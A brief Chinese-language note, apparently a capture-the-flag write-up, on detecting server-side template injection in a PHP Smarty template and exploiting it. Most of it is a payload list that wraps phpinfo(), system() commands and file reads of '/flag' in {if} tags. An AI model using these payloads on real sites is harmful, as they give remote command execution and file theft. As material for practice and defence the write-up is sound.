随便传入一个参数
?a={{77}} //回显49
?a=7{comment}7 //回显77
确定为模板注入
常用payload
{if phpinfo()}{/if}
{if system(‘ls’)}{/if}
{if readfile(‘/flag’)}{/if}
{if show_source(‘/flag’)}{/if}
{if system(‘cat ../../../flag’)}{/if}
{if}标签中可以执行php语句
若有收获,就点个赞吧
0 人点赞
